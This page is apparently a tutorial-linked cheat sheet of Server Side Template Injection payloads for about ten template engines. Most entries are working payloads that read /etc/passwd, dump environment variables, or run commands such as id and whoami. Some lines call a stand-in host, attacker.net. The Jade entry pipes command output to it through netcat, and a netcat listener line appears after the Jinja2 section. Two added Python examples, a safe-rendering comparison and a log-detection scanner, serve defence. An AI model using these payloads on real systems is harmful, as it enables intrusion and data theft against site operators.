Server Side Template Injection Payloads

We hope you have completed watching our Server Side Template Injection tutorial video on our YouTube channel. If you have not yet watched the video, you should do that before going through this article, because it will not make sense if you are unaware of the Server Side Template Injection vulnerability. We are attaching the video here so that you can easily watch it.

Server Side Template Injection Vulnerability Tutorial Video

List of different payloads

Ruby

Basic Injection

<%= 7 * 7 %>

Retrieve /etc/passwd

<%= File.open('/etc/passwd').read %>

List files and directories

<%= Dir.entries('/') %>


Java

Basic injection

${7*7}
${{7*7}}
${class.getClassLoader()}
${class.getResource("").getPath()}
${class.getResource("../../../../../index.htm").getContent()}

Retrieve the system’s environment variables

${T(java.lang.System).getenv()}

Retrieve /etc/passwd

${T(java.lang.Runtime).getRuntime().exec('cat /etc/passwd')}

${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}


Twig

Basic Injection

{{7*7}}

{{7*'7'}} would result in 49

Code execution

{{self}}

{{_self.env.setCache("ftp://attacker.net:2121")}}

{{_self.env.loadTemplate("backdoor")}}

{{_self.env.registerUndefinedFilterCallback("exec")}}

{{_self.env.getFilter("id")}}


Smarty

{php}echo `id`;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"",self::clearConfig())}


Freemarker

Basic injection

${3*3}

#{3*3}

Code execution

<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}

[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}

${"freemarker.template.utility.Execute"?new()("id")}


Jade / Codepen

- var x = root.process

- x = x.mainModule.require

- x = x('child_process')

= x.exec('id | nc attacker.net 80')


Velocity

#set($str=$class.inspect("java.lang.String").type)

#set($chr=$class.inspect("java.lang.Character").type)

#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))$ex.waitFor()

#set($out=$ex.getInputStream())

#foreach($i in [1..$out.available()])

$str.valueOf($chr.toChars($out.read()))

#end


Mako

<%
import os
x=os.popen('id').read()
%>
${x}


Jinja2

Basic injection

{{4*4}}[[5*5]]

{{7*'7'}} would result in 7777777

{{config.items()}}

Dump all used classes

{{ [].class.base.subclasses() }}
{{''.class.mro()[1].subclasses()}}
{{ ''.__class__.__mro__[2].__subclasses__() }}

Dump all config variables

{% for key, value in config.iteritems() %}
{{ key|e }}
{{ value|e }}
{% endfor %}

Read remote file

# ''.__class__.__mro__[2].__subclasses__()[40] = File class
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/tmp/flag").read() }}

Write into remote file

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}

Remote Code Execution

Listen for Connection

nc -lnvp 8000
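The Jinja2 probes above only work when user input is spliced into the template source. The following added example (written for this page, not code from the original author) shows the three ways a Flask/Jinja2 application can handle an attacker-controlled value: the vulnerable pattern, the correct fix (pass the value as data to a fixed template), and `jinja2.sandbox.SandboxedEnvironment` as defence in depth. It requires the `jinja2` package; the helper names `render_vulnerable`, `render_safe` and `render_sandboxed` and the two constructed inputs are this example's own.

```python
# Added example (not from the original page): how the same user-controlled value is
# handled by a vulnerable, a fixed and a sandboxed Jinja2 render. Requires jinja2;
# the render_* helper names are hypothetical.
from jinja2 import BaseLoader, Environment
from jinja2.sandbox import SandboxedEnvironment, SecurityError

# Constructed inputs: the engine-fingerprint probe listed above, and the first step
# of the __class__/__mro__ walk that the class-dump payloads build on.
PROBE = "{{7*'7'}}"
DUNDER_WALK = "{{ ''.__class__.__mro__ }}"


def render_vulnerable(user_input: str) -> str:
    """The SSTI bug: user input is concatenated INTO the template source, so the
    engine parses and evaluates whatever expressions it contains."""
    env = Environment(loader=BaseLoader())
    return env.from_string("Hello " + user_input).render()


def render_safe(user_input: str) -> str:
    """The fix: the template is fixed at development time and user input is passed
    as DATA. The value is printed literally (and HTML-escaped), never evaluated."""
    env = Environment(loader=BaseLoader(), autoescape=True)
    return env.from_string("Hello {{ name }}").render(name=user_input)


def render_sandboxed(user_input: str) -> str:
    """Defence in depth for the rare case where the template source genuinely must
    be user-supplied: SandboxedEnvironment refuses unsafe attribute access (any
    attribute starting with '_') with SecurityError. It still evaluates ordinary
    expressions, so it is not a substitute for render_safe()."""
    env = SandboxedEnvironment(loader=BaseLoader())
    try:
        return env.from_string("Hello " + user_input).render()
    except SecurityError as exc:
        return "BLOCKED: " + str(exc)


if __name__ == "__main__":
    for label, fn in [("vulnerable", render_vulnerable),
                      ("safe", render_safe),
                      ("sandboxed", render_sandboxed)]:
        print(f"{label:10} probe  -> {fn(PROBE)!r}")
        print(f"{label:10} dunder -> {fn(DUNDER_WALK)!r}")
```

Run it and the vulnerable path returns `Hello 7777777` for the probe (the fingerprint the page lists), the safe path returns the probe text unevaluated, and the sandbox blocks the dunder walk but still evaluates the arithmetic probe, which is why the sandbox alone is not the fix.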


Jinjava

Basic injection

{{'a'.toUpperCase()}} would result in 'A'

{{ request }} would return a request object like com.[...].context.TemplateContextRequest@23548206

Command execution

{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}

{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}

{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}

{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
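The payload families listed on this page share a small number of recognisable shapes: delimited arithmetic probes used to fingerprint the engine, Python dunder walks, Twig `_self.env` internals, Java reflection via `T(...)` or `getClass().forName(...)`, and engine-specific execution hooks such as Freemarker `?new()` or Smarty `{php}`. The following added example (not part of the original page) turns those shapes into detection rules and runs them over percent-decoded query values from constructed access-log lines. `RULES`, `classify`, `scan_access_log` and the `SAMPLE_LOG` lines are all constructed for this example.

```python
# Added example (not from the original page): detection of the SSTI probe and
# traversal patterns catalogued above in web-server access logs. Rule names,
# helper names and the SAMPLE_LOG lines are constructed for this example.
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Each rule is (name, regex); patterns are generalised from the payload families above.
RULES = [
    # Engine fingerprint probes: {{7*7}}, ${7*7}, ${{7*7}}, <%= 7 * 7 %>, #{3*3}, [[5*5]], {{7*'7'}}
    ("arith_probe", re.compile(r"(\{\{|\$\{\{?|<%=|#\{|\[\[)\s*\d+\s*\*\s*'?\d+'?\s*(\}\}|\}|%>|\]\])")),
    # Python object walks against Jinja2 / Mako: __class__.__mro__[..].__subclasses__()
    ("py_traversal", re.compile(r"__(class|mro|subclasses|globals|builtins)__|\.class\.(base|mro)\b|\.subclasses\(\)")),
    # Twig environment internals: _self.env.setCache / loadTemplate / registerUndefinedFilterCallback
    ("twig_env", re.compile(r"_self\.env\.")),
    # Java EL / Spring EL / Velocity / Jinjava reflection: T(java.lang.Runtime), getClass().forName(...)
    ("java_reflection", re.compile(r"T\(java\.lang\.\w+\)|getClass\(\)\s*\.forName\(|class\.getClassLoader|\$class\.inspect\(")),
    # Freemarker ?new(), Smarty {php}, Jade process.mainModule.require, Mako os.popen
    ("engine_exec_api", re.compile(r"\?new\(\)|\{php\}|mainModule\.require|os\.popen\(")),
]

# Combined log format: ip ident user [timestamp] "METHOD target PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)


def classify(value: str) -> list:
    """Names of every rule that fires on one already-decoded value, in rule order."""
    return [name for name, rx in RULES if rx.search(value)]


def decoded_values(target: str) -> list:
    """Path plus every query value of a request target, decoded once, i.e. the form
    the application (and therefore the template engine) would actually see."""
    parts = urlsplit(target)
    values = [unquote_plus(parts.path)]
    values += [v for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    return values


def scan_access_log(lines) -> list:
    """One finding per log line whose path or query triggers at least one rule."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-log line: skip rather than crash on malformed input
        hits = []
        for value in decoded_values(m.group("target")):
            hits += [h for h in classify(value) if h not in hits]
        if hits:
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "target": m.group("target"), "rules": hits})
    return findings


# Constructed sample: three probes from one client, two benign requests from another.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /greet?name=%7B%7B7*%277%27%7D%7D HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /greet?name=%7B%7B%27%27.__class__.__mro__%5B2%5D.__subclasses__()%7D%7D HTTP/1.1" 500 0',
    '203.0.113.7 - - [10/Oct/2023:13:55:49 +0000] "GET /greet?name=%24%7BT(java.lang.Runtime).getRuntime()%7D HTTP/1.1" 200 512',
    '198.51.100.4 - - [10/Oct/2023:13:56:02 +0000] "GET /greet?name=Alice HTTP/1.1" 200 512',
    '198.51.100.4 - - [10/Oct/2023:13:56:10 +0000] "GET /search?q=price+%2A+7 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ip']} [{f['ts']}] {','.join(f['rules'])} {f['target']}")
```

The probe rule deliberately requires the engine delimiters around the arithmetic, so ordinary text such as `price * 7` does not fire; in production you would also decode request bodies and headers, since these payloads are not limited to the query string, and treat a fingerprint probe followed by a traversal or reflection hit from the same client as a higher-severity sequence than either alone.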
